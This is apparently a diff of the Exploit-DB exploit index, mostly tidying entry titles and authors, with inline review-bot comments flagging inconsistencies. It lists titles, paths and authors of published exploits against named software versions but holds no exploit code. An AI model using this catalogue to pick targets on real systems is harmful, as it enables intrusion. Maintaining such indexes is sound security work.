21678,exploits/solaris/remote/21678.c,"Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris,
21680,exploits/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow",2002-08-05,Kanatoko,remote,windows,
21681,exploits/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,windows,
21682,exploits/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,unix,
@ -13006,7 +13008,7 @@ id,file,description,date,author,type,platform,port
21697,exploits/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",remote,windows,
21698,exploits/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",remote,windows,
21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware,
21704,exploits/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix,
21704,exploits/unix/remote/21704.txt,"W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix,
21705,exploits/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,remote,windows,
21706,exploits/linux/remote/21706.txt,"RedHat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,remote,linux,
21707,exploits/windows/remote/21707.txt,"GoAhead Web Server 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,remote,windows,
@ -13079,7 +13081,7 @@ id,file,description,date,author,type,platform,port
21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,
21932,exploits/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",remote,windows,
21934,exploits/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",remote,linux,
21936,exploits/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux,
21936,exploits/linux/remote/21936.c,"ATP HTTPd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux,
21937,exploits/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Remote Buffer Overflow",2002-10-07,flea,remote,linux,
21940,exploits/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",remote,windows,
21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,
@ -13087,7 +13089,7 @@ id,file,description,date,author,type,platform,port
21945,exploits/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",remote,linux,
21947,exploits/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,remote,unix,
21948,exploits/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,remote,unix,
21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,remote,windows,
21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow",2002-10-21,Kanatoko,remote,windows,
21958,exploits/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",remote,windows,
21959,exploits/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",remote,windows,
21964,exploits/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",remote,windows,
@ -13101,8 +13103,8 @@ id,file,description,date,author,type,platform,port
22000,exploits/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,remote,cgi,
22001,exploits/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",remote,windows,
22007,exploits/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",remote,windows,
22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux,
22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux,
22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - 'GET' Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux,
22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - 'GET' Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux,
22016,exploits/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,remote,linux,
22018,exploits/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,remote,windows,
22020,exploits/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,remote,multiple,
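Review bot: rows 22012 and 22013 now quote the method as 'GET', but the next row, 22016 "LibHTTPD 1.2 - POST Buffer Overflow", is left with an unquoted POST. Apply the same quoting there so the convention introduced by this commit is consistent within the block.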
@ -13882,7 +13884,7 @@ id,file,description,date,author,type,platform,port
25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple,
25194,exploits/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",remote,windows,
29277,exploits/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",remote,windows,
24999,exploits/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows,
24999,exploits/windows/remote/24999.py,"Light HTTPd 0.1 (Windows) - Remote Buffer Overflow",2013-04-25,"Jacob Holcomb",remote,windows,
25294,exploits/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,remote,windows,
25001,exploits/linux/remote/25001.rb,"GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)",2013-04-25,Metasploit,remote,linux,
25005,exploits/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",remote,linux,
@ -14105,7 +14107,7 @@ id,file,description,date,author,type,platform,port
26622,exploits/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,remote,php,
40386,exploits/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",remote,hardware,161
26737,exploits/linux_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force",2013-07-11,kingcope,remote,linux_x86,
26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80
26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,remote,windows,80
26741,exploits/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",remote,linux,
26768,exploits/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,remote,cgi,
26773,exploits/windows/remote/26773.txt,"LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access",2005-12-12,dr_insane,remote,windows,
@ -14170,7 +14172,7 @@ id,file,description,date,author,type,platform,port
27806,exploits/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",remote,windows,
27606,exploits/windows/remote/27606.rb,"Intrasrv 1.0 - Remote Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80
27607,exploits/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,windows,8000
27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80
27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,remote,windows,80
27610,exploits/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,remote,php,80
27611,exploits/windows/remote/27611.txt,"Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow",2013-08-15,"Packet Storm",remote,windows,
27627,exploits/windows/remote/27627.txt,"Saxopress - 'URL' Directory Traversal",2006-04-11,SecuriTeam,remote,windows,
@ -14278,7 +14280,7 @@ id,file,description,date,author,type,platform,port
28501,exploits/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,remote,multiple,
28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware,
28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows,
28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPD Directory Traversal",2006-09-16,bug-finder,remote,linux,
28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPd Directory Traversal",2006-09-16,bug-finder,remote,linux,
28602,exploits/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",remote,multiple,
28639,exploits/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,remote,linux,
28640,exploits/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",remote,windows,
@ -14660,7 +14662,7 @@ id,file,description,date,author,type,platform,port
31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows,
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows,
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
@ -14671,7 +14673,7 @@ id,file,description,date,author,type,platform,port
31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple,
31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix,
31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware,
31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000
@ -15836,9 +15838,10 @@ id,file,description,date,author,type,platform,port
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091
43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware,
43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware,
43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,
43876,exploits/php/remote/43876.rb,"Kaltura - Remote PHP Code Execution over Cookie (Metasploit)",2018-01-24,Metasploit,remote,php,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,
40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@ -15929,7 +15932,7 @@ id,file,description,date,author,type,platform,port
41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43360,exploits/linux/remote/43360.py,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
43376,exploits/android/remote/43376.rb,"Samsung Internet Browser - SOP Bypass (Metasploit)",2017-12-20,"Dhiraj Mishra",remote,android,
@ -15981,7 +15984,7 @@ id,file,description,date,author,type,platform,port
41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows,
42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,Metasploit,remote,hardware,80
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,
41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows,
41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple,
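Review bot: row 41719 changes the author field from Metasploit to "Pedro Ribeiro" while the title keeps the "(Metasploit)" suffix, so the row no longer follows the pattern of the other module rows in this diff (43876, 43877, 41614, 43356), which keep Metasploit as author. If the intent is to credit the original researcher for Metasploit modules, state that rule and apply it to the sibling rows too. Otherwise, a search by author will return an inconsistent subset of modules.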
@ -23446,7 +23449,7 @@ id,file,description,date,author,type,platform,port
12510,exploits/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",webapps,php,
12514,exploits/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,webapps,php,
12515,exploits/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",webapps,php,
12517,exploits/php/webapps/12517.txt,"Getsimple 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php,
12517,exploits/php/webapps/12517.txt,"Getsimple CMS 2.01 - Local File Inclusion",2010-05-06,Batch,webapps,php,
12519,exploits/php/webapps/12519.txt,"AV Arcade - 'Search' Cross-Site Scripting / HTML Injection",2010-05-06,"Vadim Toptunov",webapps,php,
12520,exploits/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",webapps,php,
12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,
@ -28289,7 +28292,7 @@ id,file,description,date,author,type,platform,port
26295,exploits/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,webapps,php,
26296,exploits/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,webapps,php,
26009,exploits/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",webapps,php,
26012,exploits/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80
26012,exploits/windows/webapps/26012.rb,"Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,webapps,windows,80
26014,exploits/php/webapps/26014.txt,"FForm Sender 1.0 - 'Processform.php3?Name' Cross-Site Scripting",2005-07-19,rgod,webapps,php,
26015,exploits/php/webapps/26015.txt,"Form Sender 1.0 - 'Processform.php3?Failed' Cross-Site Scripting",2005-07-19,rgod,webapps,php,
26016,exploits/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,webapps,php,
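Review bot: the rewritten title for 26012 fixes the "ZENworks" casing but still carries the misspelling "Managment" in "Novell ZENworks Mobile Device Managment 2.6.1/2.7.0". Since this row is being touched for a title cleanup, correct it to "Management" in the same change so that a title search on the product name matches.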
@ -31033,7 +31036,7 @@ id,file,description,date,author,type,platform,port
30191,exploits/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting",2007-06-14,"Rajat Swarup",webapps,jsp,
29672,exploits/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",webapps,php,80
29673,exploits/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",webapps,hardware,37777
29674,exploits/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp,
29674,exploits/jsp/webapps/29674.txt,"ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp,
29675,exploits/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,asp,
29789,exploits/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,webapps,php,
29694,exploits/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,webapps,php,
@ -33866,8 +33869,8 @@ id,file,description,date,author,type,platform,port
34511,exploits/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",webapps,php,80
34513,exploits/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",webapps,multiple,
34514,exploits/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",webapps,php,80
34518,exploits/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp,
34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400
34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80
34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple,
34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php,
@ -34635,7 +34638,7 @@ id,file,description,date,author,type,platform,port
35722,exploits/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",webapps,php,80
35723,exploits/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",webapps,php,
35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,
35726,exploits/php/webapps/35726.py,"Getsimple 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php,
35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp,
35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
@ -35252,7 +35255,7 @@ id,file,description,date,author,type,platform,port
36675,exploits/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injections",2015-04-08,LiquidWorm,webapps,php,80
36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
36678,exploits/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
@ -35820,7 +35823,7 @@ id,file,description,date,author,type,platform,port
37524,exploits/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,webapps,hardware,80
37527,exploits/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",webapps,hardware,
37528,exploits/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",webapps,php,80
37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows,
37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows,
37530,exploits/php/webapps/37530.txt,"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",webapps,php,80
37531,exploits/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",webapps,hardware,
37532,exploits/hardware/webapps/37532.txt,"AirLive (Multiple Products) - OS Command Injection",2015-07-08,"Core Security",webapps,hardware,8080
@ -35859,7 +35862,7 @@ id,file,description,date,author,type,platform,port
37584,exploits/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",webapps,php,
37585,exploits/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php?subject_module_id' SQL Injection",2012-08-07,"Chris Cooper",webapps,php,
37586,exploits/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,webapps,php,
37587,exploits/php/webapps/37587.txt,"Getsimple - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php,
37587,exploits/php/webapps/37587.txt,"Getsimple CMS 3.1.2 - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php,
37588,exploits/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,webapps,php,80
37589,exploits/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",webapps,java,
37590,exploits/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",webapps,php,
@ -36482,7 +36485,7 @@ id,file,description,date,author,type,platform,port
38816,exploits/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",webapps,jsp,
38819,exploits/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",webapps,php,
38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,webapps,php,
